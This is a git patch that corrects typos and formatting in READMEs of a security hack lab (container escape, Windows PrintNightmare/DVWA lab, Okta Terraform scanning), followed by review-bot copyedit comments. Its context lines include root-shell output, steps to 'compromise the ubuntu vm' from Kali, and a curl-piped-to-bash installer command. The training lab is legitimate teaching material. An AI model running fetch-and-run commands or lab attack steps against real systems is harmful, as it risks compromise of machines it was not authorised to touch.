@@ -210,7 +210,7 @@ id uid=0(root) gid=0(root) groups=0(root),33(www-data) ``` -- next we compromise the the ubuntu vm +- next we compromise the ubuntu vm - login via another console to your Kali machine ```bash @@ -256,7 +256,7 @@ password: ${random_string.suffix.result} bash -c "$(curl -sSL https://install.mondoo.com/sh/cnquery)" ``` -### List all privileged Pods +### List all privileged Pods - kubectl cli @@ -554,7 +554,7 @@ spec: ' ``` -- next we compromise the the ubuntu vm +- next we compromise the ubuntu vm - login via another console to your Kali machine ```bash diff --git a/hack-lab/windows-hack-environment/README.md b/hack-lab/windows-hack-environment/README.md index 59e9481..23dd4f8 100644 --- a/hack-lab/windows-hack-environment/README.md +++ b/hack-lab/windows-hack-environment/README.md @@ -9,7 +9,7 @@ This folder contains Terraform automation code to provision the following: - **Windows 2016 DVWA** - This instance is provisioned for the demonstration of the Windows Hack and Printnightmare vulnerability/ DVWA App hack. (ami-0808d6a0d91e57fd3 in eu-central-1) -### Prerequsites +### Prerequisites - [AWS Account](https://aws.amazon.com/free/) - [AWS CLI](https://docs.aws.amazon.com/cli/latest/userguide/install-cliv2.html) - `~> aws-cli/2.4.28` @@ -38,7 +38,7 @@ Before provisioning set the following environment variables: - `TF_VAR_ssh_key_path` - Path to to local ssh key for connecting to Kali Linux instance. - `TF_VAR_publicIP` - IP address of your home network to be applied to the security group for the Kali Linux, Ubuntu and Windows instance. example: `1.1.1.1/32` -### Example configuration +### Example configuration Open a terminal and run the following commands: diff --git a/okta/okta-terraform-provisioning/README.md b/okta/okta-terraform-provisioning/README.md index 3fc0035..2ad0fb2 100644 --- a/okta/okta-terraform-provisioning/README.md +++ b/okta/okta-terraform-provisioning/README.md 
@@ -2,7 +2,7 @@ This repository contains example HashiCorp Terraform code for provisioning an Okta organization. -### Prerequsites +### Prerequisites To use try the code in this repository, you will need the following: @@ -12,7 +12,7 @@ To use try the code in this repository, you will need the following: ## Setup Okta Dev Account -If you do not already have an Okta development environment, sign-up for a free account at [developer.okta.com](https://developer.okta.com). +If you do not already have an Okta development environment, sign-up for a free account at [developer.okta.com](https://developer.okta.com). ### Okta HealthInsights @@ -22,11 +22,11 @@ Okta HealthInsights provides recommended security tasks to improve security for ### Create an Okta API token -To manage Okta with Terraform and scan Okta with cnspec, you will need an Okta API token. Visit [Create an API token](https://developer.okta.com/docs/guides/create-an-api-token/main/) to learn how to create an API token. +To manage Okta with Terraform and scan Okta with cnspec, you will need an Okta API token. Visit [Create an API token](https://developer.okta.com/docs/guides/create-an-api-token/main/) to learn how to create an API token. ## Fork and clone this repository -If you want to try this code, first thing you should do is Fork it, then clone it locally. +If you want to try this code, first thing you should do is fork it, then clone it locally. ### Configure Okta Provider for Terraform 
@@ -47,19 +47,19 @@ This repository is configured to use my own GCP GCS bucket for the Terraform bac ### Terraform Init -Once the backend is configured, cd into the `terraform` directory in this repo and run `terraform init` to download the modules and initialize the backend. +Once the backend is configured, cd into the `terraform` directory in this repo and run `terraform init` to download the modules and initialize the backend. ### Security scan Terraform HCL with cnspec (pre-plan) Run the following command from the root directory of this repository to scan the Terraform code in this repository before you apply any changes to your Okta environment: -```typscript +```typescript cnspec scan terraform ./terraform -f policies/okta-security.mql.yaml ``` ### Security scan Terraform Plan with cnspec (post-plan) -The policy in this repository also supports scanning of Terraform plan files which provides a deeper level of understanding of the configuration changes to be applied. +The policy in this repository also supports scanning of Terraform plan files which provides a deeper level of understanding of the configuration changes to be applied. #### Generate a Terraform plan.json to scan @@ -71,14 +71,6 @@ terraform show -json tfplan > tfplan.json #### Scan the Terraform tfplan.json -```typscript +```typescript cnspec scan terraform plan tfplan.json -f policies/okta-security.mql.yaml ``` - - - - - - - -
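Review bot: the TOC hunk in README.md (@@ -23,26) drops the "Start the host listener" entry and adds "Escape time", but no matching heading change appears in the body hunks of this patch; please confirm that the `### Start the host listener` section was actually removed (or renamed) and that an `## Escape time` heading exists whose anchor is `#escape-time`, otherwise the new link is dead. The renamed `#determine-the-attacker-machines-public-ip` anchor does line up with the heading change in the @@ -346,7 hunk.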
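Review bot: the line changed in the README.md @@ -68,19 hunk still reads "make sure to login to you Google Cloud account"; while touching it, make it "make sure to log in to your Google Cloud account". The nearby context line "make sure you to give the account your login in with the following IAM role" has the same kind of slip and reads better as "make sure to give the account you log in with the following IAM role". The `gcloud config set project #e.g. my-test-project` block also hides the required argument behind the comment; `gcloud config set project <PROJECT_ID>  # e.g. my-test-project` makes it clear that a project ID is expected.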
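Review bot: the README.md @@ -97,25 hunk only retags the fences as bash, but step 5 still shows `terraform apply plan.out -auto-approve`; applying a saved plan file never prompts for confirmation, so `-auto-approve` is redundant there, and Terraform's CLI expects options before the positional plan file anyway. `terraform apply plan.out` is enough. Step 4's "safe plan to a local file" presumably means "save the plan to a local file".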
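Review bot: the rewritten sentence in the README.md @@ -269,7 hunk keeps a misplaced comma: "select "Create / Reset Database" after which, you will be logged out" should be "select "Create / Reset Database", after which you will be logged out." The same sentence is changed identically in hack-lab/container-escape/minikube/output.tf (@@ -46,7), so fix both copies in this pass.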
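Review bot: in the README.md @@ -472,7 hunk the captured hostname context line ends in `.c.-development-3.internal`; GKE internal node names carry the project ID between `.c.` and `.internal`, and a project ID cannot start with a hyphen, so this looks like a partially redacted value. Either redact the whole project segment consistently or replace it with an obvious placeholder such as `<PROJECT_ID>` so readers do not take it for a real name.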
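Review bot: the @@ -38,7 hunk in hack-lab/windows-hack-environment/README.md strips trailing whitespace from the "Example configuration" heading but leaves the context line two lines above, "Path to to local ssh key for connecting to Kali Linux instance", with a doubled "to"; that is the same class of fix as the "the the" corrections in minikube/output.tf (@@ -210,7 and @@ -554,7), so it belongs in this patch.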
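Review bot: retagging the fences from `typscript` to `typescript` in okta/okta-terraform-provisioning/README.md (@@ -47,19 and @@ -71,14) corrects the spelling but not the language: both blocks contain a shell command (`cnspec scan terraform ./terraform -f policies/okta-security.mql.yaml`), so tag them as bash, as the other READMEs in this patch now do; otherwise the highlighter treats a CLI invocation as TypeScript. The whitespace-only hunks in the same file (@@ -2,7, @@ -12,7, @@ -22,11) leave two context typos in place that are worth fixing while here: "To use try the code in this repository" (drop either "use" or "try"), and "sign-up" used as a verb should be "sign up".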